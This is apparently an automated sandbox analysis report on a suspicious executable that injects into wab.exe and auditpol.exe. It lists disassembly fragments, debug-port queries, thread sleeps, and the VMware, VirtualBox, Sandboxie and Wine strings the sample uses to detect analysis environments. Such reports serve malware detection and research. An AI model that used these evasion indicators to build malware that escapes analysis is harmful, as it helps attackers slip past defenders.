Source:	Binary string: System.Core.ni.pdbRSDS source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdb source: WERF40C.tmp.dmp.5.dr

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B8833E5 pushad ; ret	0_2_00007FFD9B8833E9
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B950068 push esp; retf 4810h	0_2_00007FFD9B950312
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_004018EF push ebp; retf	1_2_004018F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0040D0A7 pushad ; iretd	1_2_0040D0A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_004181A4 push cs; retf	1_2_004181AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00426AE3 push edi; retf	1_2_00426AEE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00401A89 push esp; retf	1_2_00401A8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00402359 push ds; retf	1_2_0040235A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0040B35B push ebx; retf	1_2_0040B360
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00403379 push cs; ret	1_2_0040337D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00414BB8 push esp; iretd	1_2_00414BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0041855C push ds; ret	1_2_0041855D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0040D6D4 push edx; ret	1_2_0040D6DF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_004036A0 push eax; ret	1_2_004036A2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00415FE3 push FFFFFFF7h; retf	1_2_00415FF6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E709AD push ecx; mov dword ptr [esp], ecx	1_2_02E709B6
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036509AD push ecx; mov dword ptr [esp], ecx	10_2_036509B6
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B2209 push ebp; retf	10_2_029B220A
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B11F0 push esi; retf 58ACh	10_2_029B12A0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029C3437 push edi; retf	10_2_029C344B
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029C3440 push edi; retf	10_2_029C344B
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B1515 push esp; iretd	10_2_029B153D
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029A9A04 pushad ; iretd	10_2_029A9A06
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B4B01 push cs; retf	10_2_029B4B07
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B2940 push FFFFFFF7h; retf	10_2_029B2953
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B4EB9 push ds; ret	10_2_029B4EBA
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029A7CB8 push ebx; retf	10_2_029A7CBD
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029BECF0 push ebx; ret	10_2_029BED48
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_034753C8 push esp; iretd	10_2_034753C9
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347F3D7 push B4B0ADBBh; ret	10_2_0347F3E1
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347F2A0 push EB62C342h; iretd	10_2_0347F2A5

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RN# D7521-RN-00353 REV-2.exe PID: 6796, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Memory allocated: 1C076F70000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Memory allocated: 1C0788E0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 1_2_02E9BBA0 rdtsc

1_2_02E9BBA0

Source: C:\Windows\SysWOW64\auditpol.exe	Window / User API: threadDelayed 497			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Window / User API: threadDelayed 9476			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\auditpol.exe	API coverage: 3.0 %

Source: C:\Windows\SysWOW64\auditpol.exe TID: 5460	Thread sleep count: 497 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe TID: 5460	Thread sleep time: -994000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe TID: 5460	Thread sleep count: 9476 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe TID: 5460	Thread sleep time: -18952000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe TID: 1368	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe TID: 1368	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe TID: 1368	Thread sleep time: -43000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe TID: 1368	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe TID: 1368	Thread sleep time: -51000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\auditpol.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\auditpol.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\auditpol.exe

Code function: 10_2_029BC2D0 FindFirstFileW,FindNextFileW,FindClose,

10_2_029BC2D0

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: uIklAoJgpkP.exe, 0000000B.00000002.4129044517.000000000054F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: auditpol.exe, 0000000A.00000002.4129063317.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2306887683.000001513C14C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 1_2_02E9BBA0 rdtsc

1_2_02E9BBA0

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 1_2_00417883 LdrLoadDll,

1_2_00417883

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E802E1 mov eax, dword ptr fs:[00000030h]	1_2_02E802E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E802E1 mov eax, dword ptr fs:[00000030h]	1_2_02E802E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E802E1 mov eax, dword ptr fs:[00000030h]	1_2_02E802E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2F2F8 mov eax, dword ptr fs:[00000030h]	1_2_02F2F2F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F452E2 mov eax, dword ptr fs:[00000030h]	1_2_02F452E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E692FF mov eax, dword ptr fs:[00000030h]	1_2_02E692FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E792C5 mov eax, dword ptr fs:[00000030h]	1_2_02E792C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E792C5 mov eax, dword ptr fs:[00000030h]	1_2_02E792C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A2C3 mov eax, dword ptr fs:[00000030h]	1_2_02E7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A2C3 mov eax, dword ptr fs:[00000030h]	1_2_02E7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A2C3 mov eax, dword ptr fs:[00000030h]	1_2_02E7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A2C3 mov eax, dword ptr fs:[00000030h]	1_2_02E7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A2C3 mov eax, dword ptr fs:[00000030h]	1_2_02E7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0 mov eax, dword ptr fs:[00000030h]	1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0 mov eax, dword ptr fs:[00000030h]	1_2_02E9B2C0
